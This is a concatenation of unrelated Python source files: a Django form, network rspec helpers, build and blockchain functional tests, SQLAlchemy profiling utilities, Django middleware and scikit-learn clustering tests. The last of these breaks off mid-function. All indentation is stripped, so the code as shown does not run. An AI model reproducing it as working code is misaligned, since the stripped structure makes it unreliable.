# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.widgets import CKEditorWidget
from django import forms
from base.models.learning_achievement import LearningAchievement, search
from reference.models import language
from reference.models.language import EN_CODE_LANGUAGE, FR_CODE_LANGUAGE
class LearningAchievementEditForm(forms.ModelForm):
text = forms.CharField(widget=CKEditorWidget(config_name='minimal'), required=False)
class Meta:
model = LearningAchievement
fields = ['code_name', 'text']
def __init__(self, data=None, initial=None, **kwargs):
initial = initial or {}
if data and data.get('language_code'):
initial['language'] = language.find_by_code(data.get('language_code'))
super().__init__(data, initial=initial, **kwargs)
self._get_code_name_disabled_status()
for key, value in initial.items():
setattr(self.instance, key, value)
def _get_code_name_disabled_status(self):
if self.instance.pk and self.instance.language.code == EN_CODE_LANGUAGE:
self.fields["code_name"].disabled = True
def save(self, commit=True):
instance = super().save(commit)
learning_achievement_other_language = search(instance.learning_unit_year,
instance.order)
if learning_achievement_other_language:
learning_achievement_other_language.update(code_name=instance.code_name)
# FIXME : We must have a English entry for each french entries
# Needs a refactoring of its model to include all languages in a single row.
if instance.language == language.find_by_code(FR_CODE_LANGUAGE):
LearningAchievement.objects.get_or_create(learning_unit_year=instance.learning_unit_year,
code_name=instance.code_name,
language=language.find_by_code(EN_CODE_LANGUAGE))
return instance
|
dana-i2cat/felix
|
refs/heads/master
|
ofam/src/src/foam/sfa/rspecs/elements/versions/nitosv1Channel.py
|
3
|
from foam.sfa.util.sfalogging import logger
from foam.sfa.util.xml import XpathFilter
from foam.sfa.util.xrn import Xrn
from foam.sfa.rspecs.elements.element import Element
from foam.sfa.rspecs.elements.node import Node
from foam.sfa.rspecs.elements.sliver import Sliver
from foam.sfa.rspecs.elements.location import Location
from foam.sfa.rspecs.elements.hardware_type import HardwareType
from foam.sfa.rspecs.elements.disk_image import DiskImage
from foam.sfa.rspecs.elements.interface import Interface
from foam.sfa.rspecs.elements.bwlimit import BWlimit
from foam.sfa.rspecs.elements.pltag import PLTag
from foam.sfa.rspecs.elements.versions.nitosv1Sliver import NITOSv1Sliver
from foam.sfa.rspecs.elements.versions.nitosv1PLTag import NITOSv1PLTag
from foam.sfa.rspecs.elements.versions.pgv2Services import PGv2Services
from foam.sfa.rspecs.elements.lease import Lease
from foam.sfa.rspecs.elements.spectrum import Spectrum
from foam.sfa.rspecs.elements.channel import Channel
class NITOSv1Channel:
@staticmethod
def add_channels(xml, channels):
network_elems = xml.xpath('//network')
if len(network_elems) > 0:
network_elem = network_elems[0]
elif len(channels) > 0:
# dirty hack that handles no resource manifest rspec
network_urn = "omf"
network_elem = xml.add_element('network', name = network_urn)
else:
network_elem = xml
# spectrum_elems = xml.xpath('//spectrum')
# spectrum_elem = xml.add_element('spectrum')
# if len(spectrum_elems) > 0:
# spectrum_elem = spectrum_elems[0]
# elif len(channels) > 0:
# spectrum_elem = xml.add_element('spectrum')
# else:
# spectrum_elem = xml
spectrum_elem = network_elem.add_instance('spectrum', [])
channel_elems = []
for channel in channels:
channel_fields = ['channel_num', 'frequency', 'standard']
channel_elem = spectrum_elem.add_instance('channel', channel, channel_fields)
channel_elems.append(channel_elem)
@staticmethod
def get_channels(xml, filter={}):
xpath = '//channel%s | //default:channel%s' % (XpathFilter.xpath(filter), XpathFilter.xpath(filter))
channel_elems = xml.xpath(xpath)
return NITOSv1Channel.get_channel_objs(channel_elems)
@staticmethod
def get_channel_objs(channel_elems):
channels = []
for channel_elem in channel_elems:
channel = Channel(channel_elem.attrib, channel_elem)
channel['channel_num'] = channel_elem.attrib['channel_num']
channel['frequency'] = channel_elem.attrib['frequency']
channel['standard'] = channel_elem.attrib['standard']
channels.append(channel)
return channels
|
mgamer/gyp
|
refs/heads/master
|
test/gyp-defines/gyptest-regyp.py
|
268
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that when the same value is repeated for a gyp define, duplicates are
stripped from the regeneration rule.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
os.environ['GYP_DEFINES'] = 'key=repeated_value key=value1 key=repeated_value'
test.run_gyp('defines.gyp')
test.build('defines.gyp')
# The last occurrence of a repeated set should take precedence over other
# values. See gyptest-multiple-values.py.
test.must_contain('action.txt', 'repeated_value')
# So the regeneration rule needs to use the correct order.
test.must_not_contain(
'Makefile', '"-Dkey=repeated_value" "-Dkey=value1" "-Dkey=repeated_value"')
test.must_contain('Makefile', '"-Dkey=value1" "-Dkey=repeated_value"')
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
os.utime("defines.gyp", None)
test.build('defines.gyp')
test.must_contain('action.txt', 'repeated_value')
test.pass_test()
|
CooloiStudio/Report_deskxd_com
|
refs/heads/master
|
report_deskxd_com/wsgi.py
|
1
|
"""
WSGI config for report_deskxd_com project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "report_deskxd_com.settings")
application = get_wsgi_application()
|
cevap/ion
|
refs/heads/master
|
test/functional/p2p_pos_doublespend.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2019 The PIVX Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a valid PoS block with a valid coinstake transaction where the
coinstake input prevout is double spent in one of the other transactions in the same block.
'''
from time import sleep
from fake_stake.base_test import ION_FakeStakeTest
class PoSDoubleSpend(ION_FakeStakeTest):
def run_test(self):
self.description = "Covers the scenario of a valid PoS block with a valid coinstake transaction where the coinstake input prevout is double spent in one of the other transactions in the same block."
self.init_test()
INITAL_MINED_BLOCKS = 300
FORK_DEPTH = 30
self.NUM_BLOCKS = 3
# 1) Starting mining blocks
self.log.info("Mining %d blocks.." % INITAL_MINED_BLOCKS)
self.node.generate(INITAL_MINED_BLOCKS)
# 2) Collect the possible prevouts
self.log.info("Collecting all unspent coins which we generated from mining...")
staking_utxo_list = self.node.listunspent()
# 3) Spam Blocks on the main chain
self.log.info("-- Main chain blocks first")
self.test_spam("Main", staking_utxo_list, fDoubleSpend=True)
sleep(2)
# 4) Mine some block as buffer
self.log.info("Mining %d more blocks..." % FORK_DEPTH)
self.node.generate(FORK_DEPTH)
sleep(2)
# 5) Spam Blocks on a forked chain
self.log.info("-- Forked chain blocks now")
err_msgs = self.test_spam("Forked", staking_utxo_list, fRandomHeight=True, randomRange=FORK_DEPTH, fDoubleSpend=True)
if not len(err_msgs) == 0:
self.log.error("result: " + " | ".join(err_msgs))
raise AssertionError("TEST FAILED")
self.log.info("%s PASSED" % self.__class__.__name__)
if __name__ == '__main__':
PoSDoubleSpend().main()
|
h3llrais3r/SickRage
|
refs/heads/master
|
lib/sqlalchemy/testing/profiling.py
|
76
|
# testing/profiling.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Profiling support for unit and performance tests.
These are special purpose profiling methods which operate
in a more fine-grained way than nose's profiling plugin.
"""
import os
import sys
from .util import gc_collect, decorator
from . import config
from .plugin.plugin_base import SkipTest
import pstats
import time
import collections
from .. import util
try:
import cProfile
except ImportError:
cProfile = None
from ..util import jython, pypy, win32, update_wrapper
_current_test = None
def profiled(target=None, **target_opts):
"""Function profiling.
@profiled()
or
@profiled(report=True, sort=('calls',), limit=20)
Outputs profiling info for a decorated function.
"""
profile_config = {'targets': set(),
'report': True,
'print_callers': False,
'print_callees': False,
'graphic': False,
'sort': ('time', 'calls'),
'limit': None}
if target is None:
target = 'anonymous_target'
@decorator
def decorate(fn, *args, **kw):
elapsed, load_stats, result = _profile(
fn, *args, **kw)
graphic = target_opts.get('graphic', profile_config['graphic'])
if graphic:
os.system("runsnake %s" % filename)
else:
report = target_opts.get('report', profile_config['report'])
if report:
sort_ = target_opts.get('sort', profile_config['sort'])
limit = target_opts.get('limit', profile_config['limit'])
print(("Profile report for target '%s'" % (
target, )
))
stats = load_stats()
stats.sort_stats(*sort_)
if limit:
stats.print_stats(limit)
else:
stats.print_stats()
print_callers = target_opts.get(
'print_callers', profile_config['print_callers'])
if print_callers:
stats.print_callers()
print_callees = target_opts.get(
'print_callees', profile_config['print_callees'])
if print_callees:
stats.print_callees()
return result
return decorate
class ProfileStatsFile(object):
""""Store per-platform/fn profiling results in a file.
We're still targeting Py2.5, 2.4 on 0.7 with no dependencies,
so no json lib :( need to roll something silly
"""
def __init__(self, filename):
self.write = (
config.options is not None and
config.options.write_profiles
)
self.fname = os.path.abspath(filename)
self.short_fname = os.path.split(self.fname)[-1]
self.data = collections.defaultdict(
lambda: collections.defaultdict(dict))
self._read()
if self.write:
# rewrite for the case where features changed,
# etc.
self._write()
@property
def platform_key(self):
dbapi_key = config.db.name + "_" + config.db.driver
# keep it at 2.7, 3.1, 3.2, etc. for now.
py_version = '.'.join([str(v) for v in sys.version_info[0:2]])
platform_tokens = [py_version]
platform_tokens.append(dbapi_key)
if jython:
platform_tokens.append("jython")
if pypy:
platform_tokens.append("pypy")
if win32:
platform_tokens.append("win")
_has_cext = config.requirements._has_cextensions()
platform_tokens.append(_has_cext and "cextensions" or "nocextensions")
return "_".join(platform_tokens)
def has_stats(self):
test_key = _current_test
return (
test_key in self.data and
self.platform_key in self.data[test_key]
)
def result(self, callcount):
test_key = _current_test
per_fn = self.data[test_key]
per_platform = per_fn[self.platform_key]
if 'counts' not in per_platform:
per_platform['counts'] = counts = []
else:
counts = per_platform['counts']
if 'current_count' not in per_platform:
per_platform['current_count'] = current_count = 0
else:
current_count = per_platform['current_count']
has_count = len(counts) > current_count
if not has_count:
counts.append(callcount)
if self.write:
self._write()
result = None
else:
result = per_platform['lineno'], counts[current_count]
per_platform['current_count'] += 1
return result
def replace(self, callcount):
test_key = _current_test
per_fn = self.data[test_key]
per_platform = per_fn[self.platform_key]
counts = per_platform['counts']
counts[-1] = callcount
if self.write:
self._write()
def _header(self):
return \
"# %s\n"\
"# This file is written out on a per-environment basis.\n"\
"# For each test in aaa_profiling, the corresponding function and \n"\
"# environment is located within this file. If it doesn't exist,\n"\
"# the test is skipped.\n"\
"# If a callcount does exist, it is compared to what we received. \n"\
"# assertions are raised if the counts do not match.\n"\
"# \n"\
"# To add a new callcount test, apply the function_call_count \n"\
"# decorator and re-run the tests using the --write-profiles \n"\
"# option - this file will be rewritten including the new count.\n"\
"# \n"\
"" % (self.fname)
def _read(self):
try:
profile_f = open(self.fname)
except IOError:
return
for lineno, line in enumerate(profile_f):
line = line.strip()
if not line or line.startswith("#"):
continue
test_key, platform_key, counts = line.split()
per_fn = self.data[test_key]
per_platform = per_fn[platform_key]
c = [int(count) for count in counts.split(",")]
per_platform['counts'] = c
per_platform['lineno'] = lineno + 1
per_platform['current_count'] = 0
profile_f.close()
def _write(self):
print(("Writing profile file %s" % self.fname))
profile_f = open(self.fname, "w")
profile_f.write(self._header())
for test_key in sorted(self.data):
per_fn = self.data[test_key]
profile_f.write("\n# TEST: %s\n\n" % test_key)
for platform_key in sorted(per_fn):
per_platform = per_fn[platform_key]
c = ",".join(str(count) for count in per_platform['counts'])
profile_f.write("%s %s %s\n" % (test_key, platform_key, c))
profile_f.close()
def function_call_count(variance=0.05):
"""Assert a target for a test case's function call count.
The main purpose of this assertion is to detect changes in
callcounts for various functions - the actual number is not as important.
Callcounts are stored in a file keyed to Python version and OS platform
information. This file is generated automatically for new tests,
and versioned so that unexpected changes in callcounts will be detected.
"""
def decorate(fn):
def wrap(*args, **kw):
if cProfile is None:
raise SkipTest("cProfile is not installed")
if not _profile_stats.has_stats() and not _profile_stats.write:
# run the function anyway, to support dependent tests
# (not a great idea but we have these in test_zoomark)
fn(*args, **kw)
raise SkipTest("No profiling stats available on this "
"platform for this function. Run tests with "
"--write-profiles to add statistics to %s for "
"this platform." % _profile_stats.short_fname)
gc_collect()
timespent, load_stats, fn_result = _profile(
fn, *args, **kw
)
stats = load_stats()
callcount = stats.total_calls
expected = _profile_stats.result(callcount)
if expected is None:
expected_count = None
else:
line_no, expected_count = expected
print(("Pstats calls: %d Expected %s" % (
callcount,
expected_count
)
))
stats.print_stats()
#stats.print_callers()
if expected_count:
deviance = int(callcount * variance)
failed = abs(callcount - expected_count) > deviance
if failed:
if _profile_stats.write:
_profile_stats.replace(callcount)
else:
raise AssertionError(
"Adjusted function call count %s not within %s%% "
"of expected %s. Rerun with --write-profiles to "
"regenerate this callcount."
% (
callcount, (variance * 100),
expected_count))
return fn_result
return update_wrapper(wrap, fn)
return decorate
def _profile(fn, *args, **kw):
filename = "%s.prof" % fn.__name__
def load_stats():
st = pstats.Stats(filename)
os.unlink(filename)
return st
began = time.time()
cProfile.runctx('result = fn(*args, **kw)', globals(), locals(),
filename=filename)
ended = time.time()
return ended - began, load_stats, locals()['result']
|
codasus/django-blogages
|
refs/heads/master
|
blogages/libs/djangotoolbox/middleware.py
|
85
|
from django.conf import settings
from django.http import HttpResponseRedirect
from django.utils.cache import patch_cache_control
LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ())
NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ())
ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None)
NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ())
NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/'
for path in NON_REDIRECTED_PATHS)
class LoginRequiredMiddleware(object):
"""
Redirects to login page if request path begins with a
LOGIN_REQURED_PREFIXES prefix. You can also specify
NO_LOGIN_REQUIRED_PREFIXES which take precedence.
"""
def process_request(self, request):
for prefix in NO_LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix):
return None
for prefix in LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix) and \
not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.get_full_path())
return None
class RedirectMiddleware(object):
"""
A static redirect middleware. Mostly useful for hosting providers that
automatically setup an alternative domain for your website. You might
not want anyone to access the site via those possibly well-known URLs.
"""
def process_request(self, request):
host = request.get_host().split(':')[0]
# Turn off redirects when in debug mode, running unit tests, or
# when handling an App Engine cron job.
if (settings.DEBUG or host == 'testserver' or
not ALLOWED_DOMAINS or
request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or
request.path.startswith('/_ah/') or
request.path in NON_REDIRECTED_PATHS or
request.path.startswith(NON_REDIRECTED_BASE_PATHS)):
return
if host not in settings.ALLOWED_DOMAINS:
return HttpResponseRedirect('http://' + settings.ALLOWED_DOMAINS[0]
+ request.path)
class NoHistoryCacheMiddleware(object):
"""
If user is authenticated we disable browser caching of pages in history.
"""
def process_response(self, request, response):
if 'Expires' not in response and \
'Cache-Control' not in response and \
hasattr(request, 'session') and \
request.user.is_authenticated():
patch_cache_control(response,
no_store=True, no_cache=True, must_revalidate=True, max_age=0)
return response
|
hrjn/scikit-learn
|
refs/heads/master
|
sklearn/cluster/tests/test_hierarchical.py
|
33
|
"""
Several basic tests for hierarchical clustering procedures
"""
# Authors: Vincent Michel, 2010, Gael Varoquaux 2012,
# Matteo Visconti di Oleggio Castello 2014
# License: BSD 3 clause
from tempfile import mkdtemp
import shutil
from functools import partial
import numpy as np
from scipy import sparse
from scipy.cluster import hierarchy
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import ignore_warnings
from sklearn.cluster import ward_tree
from sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration
from sklearn.cluster.hierarchical import (_hc_cut, _TREE_BUILDERS,
linkage_tree)
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.metrics.pairwise import PAIRED_DISTANCES, cosine_distances,\
manhattan_distances, pairwise_distances
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neighbors.graph import kneighbors_graph
from sklearn.cluster._hierarchical import average_merge, max_merge
from sklearn.utils.fast_dict import IntFloatDict
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_warns
def test_linkage_misc():
# Misc tests on linkage
rng = np.random.RandomState(42)
X = rng.normal(size=(5, 5))
assert_raises(ValueError, AgglomerativeClustering(linkage='foo').fit, X)
assert_raises(ValueError, linkage_tree, X, linkage='foo')
assert_raises(ValueError, linkage_tree, X, connectivity=np.ones((4, 4)))
# Smoke test FeatureAgglomeration
FeatureAgglomeration().fit(X)
# test hierarchical clustering on a precomputed distances matrix
dis = cosine_distances(X)
res = linkage_tree(dis, affinity="precomputed")
assert_array_equal(res[0], linkage_tree(X, affinity="cosine")[0])
# test hierarchical clustering on a precomputed distances matrix
res = linkage_tree(X, affinity=manhattan_distances)
assert_array_equal(res[0], linkage_tree(X, affinity="manhattan")[0])
def test_structured_linkage_tree():
# Check that we obtain the correct solution for structured linkage trees.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
# Avoiding a mask with only 'True' entries
mask[4:7, 4:7] = 0
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for tree_builder in _TREE_BUILDERS.values():
children, n_components, n_leaves, parent = \
tree_builder(X.T, connectivity)
n_nodes = 2 * X.shape[1] - 1
assert_true(len(children) + n_leaves == n_nodes)
# Check that ward_tree raises a ValueError with a connectivity matrix
# of the wrong shape
assert_raises(ValueError,
tree_builder, X.T, np.ones((4, 4)))
# Check that fitting with no samples raises an error
assert_raises(ValueError,
tree_builder, X.T[:0], connectivity)
def test_unstructured_linkage_tree():
# Check that we obtain the correct solution for unstructured linkage trees.
rng = np.random.RandomState(0)
X = rng.randn(50, 100)
for this_X in (X, X[0]):
# With specified a number of clusters just for the sake of
# raising a warning and testing the warning code
with ignore_warnings():
children, n_nodes, n_leaves, parent = assert_warns(
UserWarning, ward_tree, this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert_equal(len(children) + n_leaves, n_nodes)
for tree_builder in _TREE_BUILDERS.values():
for this_X in (X, X[0]):
with ignore_warnings():
children, n_nodes, n_leaves, parent = assert_warns(
UserWarning, tree_builder, this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert_equal(len(children) + n_leaves, n_nodes)
def test_height_linkage_tree():
# Check that the height of the results of linkage tree is sorted.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for linkage_func in _TREE_BUILDERS.values():
children, n_nodes, n_leaves, parent = linkage_func(X.T, connectivity)
n_nodes = 2 * X.shape[1] - 1
assert_true(len(children) + n_leaves == n_nodes)
def test_agglomerative_clustering_wrong_arg_memory():
# Test either if an error is raised when memory is not
# either a str or a joblib.Memory instance
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randn(n_samples, 50)
memory = 5
clustering = AgglomerativeClustering(memory=memory)
assert_raises(ValueError, clustering.fit, X)
def test_agglomerative_clustering():
# Check that we obtain the correct number of clusters with
# agglomerative clustering.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
for linkage in ("ward", "complete", "average"):
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage=linkage)
clustering.fit(X)
# test caching
try:
tempdir = mkdtemp()
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity,
memory=tempdir,
linkage=linkage)
clustering.fit(X)
labels = clustering.labels_
assert_true(np.size(np.unique(labels)) == 10)
finally:
shutil.rmtree(tempdir)
# Turn caching off now
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity, linkage=linkage)
# Check that we obtain the same solution with early-stopping of the
# tree building
clustering.compute_full_tree = False
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
labels), 1)
clustering.connectivity = None
clustering.fit(X)
assert_true(np.size(np.unique(clustering.labels_)) == 10)
# Check that we raise a TypeError on dense matrices
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=sparse.lil_matrix(
connectivity.toarray()[:10, :10]),
linkage=linkage)
assert_raises(ValueError, clustering.fit, X)
# Test that using ward with another metric than euclidean raises an
# exception
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=connectivity.toarray(),
affinity="manhattan",
linkage="ward")
assert_raises(ValueError, clustering.fit, X)
# Test using another metric than euclidean works with linkage complete
for affinity in PAIRED_DISTANCES.keys():
# Compare our (structured) implementation to scipy
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=np.ones((n_samples, n_samples)),
affinity=affinity,
linkage="complete")
clustering.fit(X)
clustering2 = AgglomerativeClustering(
n_clusters=10,
connectivity=None,
affinity=affinity,
linkage="complete")
clustering2.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering2.labels_,
clustering.labels_),
1)
# Test that using a distance matrix (affinity = 'precomputed') has same
# results (with connectivity constraints)
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage="complete")
clustering.fit(X)
X_dist = pairwise_distances(X)
clustering2 = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
affinity='precomputed',
linkage="complete")
clustering2.fit(X_dist)
assert_array_equal(clustering.labels_, clustering2.labels_)
def test_ward_agglomeration():
# Check that we obtain the correct solution in a simplistic case
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
agglo = FeatureAgglomeration(n_clusters=5, connectivity=connectivity)
agglo.fit(X)
assert_true(np.size(np.unique(agglo.labels_)) == 5)
X_red = agglo.transform(X)
assert_true(X_red.shape[1] == 5)
X_full = agglo.inverse_transform(X_red)
assert_true(np.unique(X_full[0]).size == 5)
assert_array_almost_equal(agglo.transform(X_full), X_red)
# Check that fitting with no samples raises a ValueError
assert_raises(ValueError, agglo.fit, X[:0])
def assess_same_labelling(cut1, cut2):
"""Util for comparison with scipy"""
co_clust = []
for cut in [cut1, cut2]:
n = len(cut)
k = cut.max() + 1
ecut = np.zeros((n, k))
ecut[np.arange(n), cut] = 1
co_clust.append(np.dot(ecut, ecut.T))
assert_true((co_clust[0] == co_clust[1]).all())
def test_scikit_vs_scipy():
# Test scikit linkage with full connectivity (i.e. unstructured) vs scipy
n, p, k = 10, 5, 3
rng = np.random.RandomState(0)
# Not using a lil_matrix here, just to check that non sparse
# matrices are well handled
connectivity = np.ones((n, n))
for linkage in _TREE_BUILDERS.keys():
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method=linkage)
children_ = out[:, :2].astype(np.int)
children, _, n_leaves, _ = _TREE_BUILDERS[linkage](X, connectivity)
cut = _hc_cut(k, children, n_leaves)
cut_ = _hc_cut(k, children_, n_leaves)
assess_same_labelling(cut, cut_)
# Test error management in _hc_cut
assert_raises(ValueError, _hc_cut, n_leaves + 1, children, n_leaves)
def test_connectivity_propagation():
# Check that connectivity in the ward tree is propagated correctly during
# merging.
X = np.array([(.014, .120), (.014, .099), (.014, .097),
(.017, .153), (.017, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .152), (.018, .149), (.018, .144)])
connectivity = kneighbors_graph(X, 10, include_self=False)
ward = AgglomerativeClustering(
n_clusters=4, connectivity=connectivity, linkage='ward')
# If changes are not propagated correctly, fit crashes with an
# IndexError
ward.fit(X)
def test_ward_tree_children_order():
# Check that children are ordered in the same way for both structured and
# unstructured versions of ward_tree.
# test on five random datasets
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X)
out_structured = ward_tree(X, connectivity=connectivity)
assert_array_equal(out_unstructured[0], out_structured[0])
def test_ward_linkage_tree_return_distance():
# Test return_distance option on linkage and ward trees
# test that return_distance when set true, gives same
# output on both structured and unstructured clustering.
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X, return_distance=True)
out_structured = ward_tree(X, connectivity=connectivity,
return_distance=True)
# get children
children_unstructured = out_unstructured[0]
children_structured = out_structured[0]
# check if we got the same clusters
assert_array_equal(children_unstructured, children_structured)
# check if the distances are the same
dist_unstructured = out_unstructured[-1]
dist_structured = out_structured[-1]
assert_array_almost_equal(dist_unstructured, dist_structured)
for linkage in ['average', 'complete']:
structured_items = linkage_tree(
X, connectivity=connectivity, linkage=linkage,
return_distance=True)[-1]
unstructured_items = linkage_tree(
X, linkage=linkage, return_distance=True)[-1]
structured_dist = structured_items[-1]
unstructured_dist = unstructured_items[-1]
structured_children = structured_items[0]
unstructured_children = unstructured_items[0]
assert_array_almost_equal(structured_dist, unstructured_dist)
assert_array_almost_equal(
structured_children, unstructured_children)
# test on the following dataset where we know the truth
# taken from scipy/cluster/tests/hierarchy_test_data.py
X = np.array([[1.43054825, -7.5693489],
[6.95887839, 6.82293382],
[2.87137846, -9.68248579],
[7.87974764, -6.05485803],
[8.24018364, -6.09495602],
[7.39020262, 8.54004355]])
# truth
linkage_X_ward = np.array([[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 9.10208346, 4.],
[7., 9., 24.7784379, 6.]])
linkage_X_complete = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.96742194, 4.],
[7., 9., 18.77445997, 6.]])
linkage_X_average = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.55832839, 4.],
[7., 9., 15.44089605, 6.]])
n_samples, n_features = np.shape(X)
connectivity_X = np.ones((n_samples, n_samples))
out_X_unstructured = ward_tree(X, return_distance=True)
out_X_structured = ward_tree(X, connectivity=connectivity_X,
return_distance=True)
# check that the labels are the same
assert_array_equal(linkage_X_ward[:, :2], out_X_unstructured[0])
assert_array_equal(linkage_X_ward[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_unstructured[4])
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_structured[4])
linkage_options = ['complete', 'average']
X_linkage_truth = [linkage_X_complete, linkage_X_average]
for (linkage, X_truth) in zip(linkage_options, X_linkage_truth):
out_X_unstructured = linkage_tree(
X, return_distance=True, linkage=linkage)
out_X_structured = linkage_tree(
X, connectivity=connectivity_X, linkage=linkage,
return_distance=True)
# check that the labels are the same
assert_array_equal(X_truth[:, :2], out_X_unstructured[0])
assert_array_equal(X_truth[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(X_truth[:, 2], out_X_unstructured[4])
assert_array_almost_equal(X_truth[:, 2], out_X_structured[4])
def test_connectivity_fixing_non_lil():
# Check non regression of a bug if a non item assignable connectivity is
# provided with more than one component.
# create dummy data
x = np.array([[0, 0], [1, 1]])
# create a mask with several components to force connectivity fixing
m = np.array([[True, False], [False, True]])
c = grid_to_graph(n_x=2, n_y=2, mask=m)
w = AgglomerativeClustering(connectivity=c, linkage='ward')
assert_warns(UserWarning, w.fit, x)
def test_int_float_dict():
rng = np.random.RandomState(0)
keys = np.unique(rng.randint(100, size=10).astype(np.intp))
values = rng.rand(len(keys))
d = IntFloatDict(keys, values)
for key, value in zip(keys, values):
assert d[key] == value
other_keys = np.arange(50).astype(np.intp)[::2]
other_values = 0.5 * np.ones(50)[::2]
other = IntFloatDict(other_keys, other_values)
# Complete smoke test
max_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
average_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
def test_connectivity_callable():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(
connectivity=partial(kneighbors_graph, n_neighbors=3, include_self=False))
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_connectivity_ignores_diagonal():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
